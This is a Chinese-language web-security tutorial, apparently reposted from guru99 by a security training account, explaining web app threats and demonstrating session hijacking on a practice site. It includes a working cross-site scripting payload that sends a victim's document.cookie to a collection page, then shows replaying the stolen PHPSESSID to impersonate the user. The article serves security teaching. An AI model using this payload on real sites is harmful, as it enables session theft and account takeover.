如何破解网站

如何破解网站

二向箔安全学院

二向箔安全学院

已认证的官方帐号

已关注

16 人赞同了该文章

信息时代促使许多组织开发基于 Web 的应用程序,用户可以在线使用该程序与组织进行交互。Web 应用程序代码编写得不够严谨的话,可能会被他人利用来对敏感数据和 Web 服务器进行未经授权的访问。

本文涉及的主题

什么是Web应用程序?什么是网络威胁?

Web 应用程序(aka网站)是基于客户端 - 服务器模型的应用程序。服务器提供数据库访问和业务逻辑。它托管在 Web 服务器上。客户端应用程序在客户端 Web 浏览器上运行。Web 应用程序通常用 Java,C#和VB.Net,PHP,ColdFusion 标记语言等语言编写。Web 应用程序中使用的数据库引擎包括 MySQL,MS SQL Server,PostgreSQL,SQLite等等。

大多数 Web 应用程序都托管在可通过 Internet 访问的公共服务器上。这使得它们易于访问,也易于受到攻击。以下是常见的 Web 应用程序威胁:

如何保护网站免受黑客攻击?

可以采用以下策略来保护网站免受 Web 服务器攻击。

破解网站

在这个实际场景中,我们将劫持位于 www.techpanda.org 的 Web 应用程序的用户会话。我们将使用跨站点脚本来读取 cookie 会话 ID,然后使用它来模拟合法的用户会话。

假设是攻击者可以访问 Web 应用程序,并且他想劫持使用相同应用程序的其他用户的会话。假设攻击者的访问帐户是有限访问帐户,此攻击的目标可能是获取对 Web 应用程序的管理员访问权限。

开始

<a href=# onclick=\"document.location=\'http://techpanda.org/snatch_sess_id.php?c=\'+escape\(document.cookie\)\;\">Dark</a>

这里,上面的代码使用了JavaScript它添加了一个带有 onclick 事件的超链接。当毫无戒心的用户单击该链接时,该事件将检索 PHP cookie 会话 ID 并将其与 URL 中的会话 ID 一起发送到 snatch_sess_id.php 页面。

注意:① 脚本可能会将值发送到存储 PHPSESSID 的某个远程服务器,然后用户重定向回网站,就好像什么也没发生一样。

② 您获得的值可能与本文中的值不同,但概念是相同的。

使用 Firefox 和 Tamper Data 插件进行会话模拟

下面的流程图显示了完成此练习必须采取的步骤。







PHPSESSID = 2DVLTIPP2N8LDBN11B2RA76LM2



注意:我们没有登录,而是使用跨站点脚本检索的 PHPSESSID 值来进行的模拟登录会话。

总结

来源:guru99.com/how-to-hack-

二向箔安全学院:主要专注于 Web 安全领域,团队曾为 Google、Apple、微软、W3C、Adobe、腾讯、阿里等输出过安全能力。致力于推进网络空间安全领域知识的创新和传播,为广大信安技术人士提供最前沿的安全技能。

二向箔安全学院twosecurity.cn图标

微信公众号:二向箔安全(twosecurity),这里有最新的课程资讯,优惠活动及免费干货分享。

编辑于 2019-09-04

黑客 (Hacker)

网络安全

信息安全

赞同 16添加评论

分享

收藏

文章被以下专栏收录